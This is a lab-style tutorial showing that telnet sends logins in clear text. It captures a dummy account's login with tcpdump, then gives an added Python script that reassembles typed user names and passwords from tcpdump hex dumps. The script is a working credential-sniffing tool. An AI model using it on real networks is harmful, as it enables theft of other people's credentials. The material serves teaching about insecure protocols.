Here is how we tested.  The following actions were performed exactly in the order in which they are numbered:
  1. First, we created a dummy user with user name lakov and password 01234 on Curly.
  2. We ran the command tcpdump -x -s 1000 | tee captured.telnet on Larry.  The -s 1000 option makes tcpdump keep the first 1000 bytes of each packet (or the whole packet if it is shorter than 1000 bytes), -x prints the captured bytes in hexadecimal, and tee both prints the output on the screen and writes it into the file captured.telnet.  Two practical notes: Larry can only capture packets that reach its own network interface, so it has to sit on the same segment as Moe and Curly; and with newer versions of tcpdump you should add -l, otherwise its output is block-buffered when piped and reaches tee only in large chunks.
  3. We ran the command telnet curly on Moe.  When prompted for a login name we entered lakov, and when prompted for a password we entered 01234.   Keep in mind how the telnet program works (this is a quick and dirty description): the client establishes a TCP connection to the telnet server, and in the usual character-at-a-time mode every key the user presses is sent to the server as soon as it is pressed; the server then echoes the character back, and that echo is what makes the letter appear on the user's screen.  (The server does not echo the password, but the password keystrokes are still sent in the clear.)  So even though we are able to capture the keystrokes, you should expect to see the user name and the password spread over separate packets, one character per packet, rather than together in one packet.

  4. Finally, we were logged in on Curly.  Unfortunately, the file captured.telnet on Larry now contained the user name and the password.  For brevity we include only the part of captured.telnet that shows how the password can be extracted, but we could just as well have included the dump of the user name and of any commands the user typed after gaining access to the machine.  Here is that part of captured.telnet, first in its raw form and then annotated.
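Before looking at the dump itself, here is an added example (not code from the original page) that automates what the annotated dump below does by hand: it parses tcpdump -x output, keeps only the TCP segments addressed to port 23 (so the server's echoes are ignored), orders them by sequence number, drops the telnet option negotiation, and splits the typed bytes at each press of Enter. The capture it parses is constructed inside the script, with invented addresses (192.168.1.2 for Moe, 192.168.1.3 for Curly), client port 1024 and zeroed checksums, so it runs offline; feeding the text of a real captured.telnet to keystrokes_to_server() does the same on a genuine dump.

```python
"""Reassemble the keystrokes a telnet client sent, from `tcpdump -x` output.
Added example; the capture below is constructed here, not from captured.telnet."""
import re
import struct

TELNET_PORT = 23
IAC, SB, SE = 0xFF, 0xFA, 0xF0          # telnet command bytes (RFC 854)


def build_packet(src_ip, dst_ip, sport, dport, seq, payload):
    """Minimal IPv4+TCP packet for constructed test data (checksums left
    zero; neither tcpdump -x nor this parser verifies them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 1, 5 << 4, 0x18, 32120, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return ip + tcp


def to_tcpdump_hex(summary, packet):
    """Render a packet the way `tcpdump -x` prints it: a summary line, then
    the bytes in 4-hex-digit groups, 16 bytes per line."""
    lines = [summary]
    for i in range(0, len(packet), 16):
        chunk = packet[i:i + 16]
        lines.append("\t\t\t " + " ".join(chunk[j:j + 2].hex() for j in range(0, len(chunk), 2)))
    return "\n".join(lines)


def parse_dump(text):
    """Gather the hex continuation lines under each summary line into raw packet
    bytes.  Accepts bare groups (old tcpdump) and the `0x0000:` offset prefix."""
    packets, buf = [], []
    for line in text.splitlines():
        body = re.sub(r"^0x[0-9a-f]+:\s*", "", line.strip(), flags=re.I)
        if body and re.fullmatch(r"[0-9a-f\s]+", body, re.I):
            buf.append(re.sub(r"\s", "", body))
        elif buf:                        # a non-hex line ends the previous packet
            packets.append(bytes.fromhex("".join(buf)))
            buf = []
    if buf:
        packets.append(bytes.fromhex("".join(buf)))
    return packets


def tcp_fields(packet):
    """Return (src_port, dst_port, seq, payload) for an IPv4/TCP packet, else None."""
    if packet[0] >> 4 != 4 or packet[9] != 6:
        return None
    tcp = packet[(packet[0] & 0x0F) * 4:]
    sport, dport, seq, _ack = struct.unpack("!HHII", tcp[:12])
    return sport, dport, seq, tcp[(tcp[12] >> 4) * 4:]


def strip_telnet_commands(data):
    """Drop IAC option negotiation (WILL/WONT/DO/DONT <opt>, SB ... IAC SE,
    other two-byte commands) and unescape a doubled IAC."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i]); i += 1
            continue
        cmd = data[i + 1] if i + 1 < len(data) else None
        if cmd == IAC:                   # IAC IAC is a literal 0xFF byte
            out.append(IAC); i += 2
        elif cmd == SB:                  # subnegotiation runs to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif cmd in (0xFB, 0xFC, 0xFD, 0xFE):   # WILL WONT DO DONT <option>
            i += 3
        else:
            i += 2
    return bytes(out)


def keystrokes_to_server(text, port=TELNET_PORT):
    """Reassemble what the client typed, one entry per press of Enter.  Only
    segments addressed to the telnet port count (server echoes are ignored);
    they are ordered by sequence number and a retransmission is kept once.
    Telnet sends Enter as CR LF or CR NUL."""
    segments = {}
    for pkt in parse_dump(text):
        fields = tcp_fields(pkt)
        if fields and fields[1] == port and fields[3]:
            segments.setdefault(fields[2], fields[3])
    typed = strip_telnet_commands(b"".join(segments[s] for s in sorted(segments)))
    lines = re.split(rb"\r\n|\r\x00", typed)
    while lines and not lines[-1]:
        lines.pop()
    return [line.decode("latin-1") for line in lines]


def constructed_capture():
    """The dump step 2 would produce for the login of step 3, constructed here:
    moe sends each keystroke in its own packet to port 23 on curly, which
    echoes the user name but not the password (assumed addresses and ports)."""
    moe, curly, seq, out = "192.168.1.2", "192.168.1.3", {"moe": 1, "curly": 1}, []

    def send(frm, payload):
        s, n = seq[frm], len(payload)
        src, dst, sport, dport, who = ((moe, curly, 1024, 23, "moe.1024 > curly.telnet") if frm == "moe"
                                       else (curly, moe, 23, 1024, "curly.telnet > moe.1024"))
        summary = f"12:00:00.{len(out) + 1:06d} {who}: P {s}:{s + n}({n}) ack 1 win 32120 (DF)"
        out.append(to_tcpdump_hex(summary, build_packet(src, dst, sport, dport, s, payload)))
        seq[frm] += n

    send("curly", bytes([IAC, 0xFB, 0x01]))      # IAC WILL ECHO: server will echo
    send("moe", bytes([IAC, 0xFD, 0x01]))        # IAC DO ECHO: client stops local echo
    for ch in b"lakov\r\n":                      # user name, echoed by the server
        send("moe", bytes([ch])); send("curly", bytes([ch]))
    for ch in b"01234\r\n":                      # password, sent in clear, never echoed
        send("moe", bytes([ch]))
    return "\n".join(out)


if __name__ == "__main__":
    print(keystrokes_to_server(constructed_capture()))   # ['lakov', '01234']
```

The direction filter is what separates the password from the noise: the server's echoes travel from port 23 back to the client, so looking only at segments whose destination port is 23 yields exactly the bytes the user typed, whether or not they were echoed. On a real capture the sequence-number ordering also matters, since tcpdump records retransmissions and out-of-order segments as they arrive.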